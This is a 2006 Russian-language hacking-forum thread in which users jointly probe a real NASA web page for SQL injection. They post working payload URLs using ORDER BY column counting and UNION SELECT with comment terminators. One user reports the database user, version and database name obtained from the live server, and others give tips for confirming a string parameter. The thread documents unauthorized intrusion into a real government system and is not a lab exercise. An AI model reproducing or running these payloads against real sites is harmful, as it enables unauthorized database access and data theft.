Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Smile! Ну, и, конечно, SQL-inject на NASA |
10.08.2006, 12:34
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Smile! Ну, и, конечно, SQL-inject на NASA
Интересная ссылка, меня сразу заинтриговала:
umbra.nascom.nasa.gov/eit/eit_guide/listings/anal.htm
Я, безусловно, понимаю, что anal - это еще и дотошный, суетливый, и тем не менее.
А вот SQL-inject. Обработать грамотно мне не хватило времени, прошу тех, кто возьмется - сообщить результаты.
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=679'+order+by+14--
P. S. order by здесь не при делах.
Последний раз редактировалось 1ten0.0net1; 10.08.2006 в 12:36..
|
|
|
10.08.2006, 12:38
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
ордер бай в мускле ВСЕГДА при делах.
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'union+select+1,2,3,4,5,6,7/*
|
|
|
|
10.08.2006, 12:45
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Я имел ввиду только то, что запрос с ORDER BY 14 не соответсвует реальному количеству столбцов \very SAD\.
|
|
|
|
10.08.2006, 12:46
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
2 ZaCo - а каким методом ты выяснил, что там string параметр? Просто по-опыту?
|
|
|
|
10.08.2006, 12:46
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
а при чем тут вообще 14? че ты мне гонишь. order by 7 последний. учитывая что это мусуль то это и есь последний тк на 8 ошибка.
---
строка потому что во-первых в это же место подставляется текст) во-вторых когда я пишу 'xa' то вижу xa
Последний раз редактировалось PinkPanther; 07.09.2006 в 20:19..
Причина: мат Зако, мат....((
|
|
|
|
10.08.2006, 12:53
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Благодаря ZaCo выявил следующее:
USER() - web@localhost
VERSION - 4.0.14-standard
DATABASE() - eospso
2 ZaCO
Почему ничего не выдает, там же - MySQL!
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6 ,7%20from%20INFORMATION_SCHEMA.COLUMNS/*
И, что еще не понятнее - чем объясняется тот факт, что запрос с комментарием -- в конце не работает, а твой - пашет???
|
|
|
|
10.08.2006, 12:55
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
хотя бы потому что там 4 ветка. -- работает до конца строки, /* до конца запроса
|
|
|
|
10.08.2006, 12:58
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Сообщение от ZaCo
а при чем тут вообще 14? Я наугад поставил цифру, чтобы не упрщать задачу другим, я это имел ввиду.
---
строка потому что во-первых в это же место подставляется текст) во-вторых когда я пишу 'xa' то вижу xa
А я пишу 'xa' в параметр и не вижу ничего!
Объясни, епожалуйста, если не лень, конечно про тип поподробнее.
|
|
|
|
10.08.2006, 12:59
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Сообщение от 1ten0.0net1
2 ZaCO
Почему ничего не выдает, там же - MySQL!
http://eospso.gsfc.nasa.gov/newsroom/viewStory.php?id=ff679'%20union+select+1,2,3,4,5,6 ,7%20from%20INFORMATION_SCHEMA.COLUMNS/*
Потому что INFORMATION_SCHEMA.COLUMNS в MSSQL.
|
|
|
|
10.08.2006, 13:06
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
я електу поставил, но не за тупость) а за ошибочное мнение. в пятой ветке мускля information_schema является системной таблицей.
1ten0.0net1 перебором - пробуешь строку, если прокатило то там можно попробовать поставить строковую функцию.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
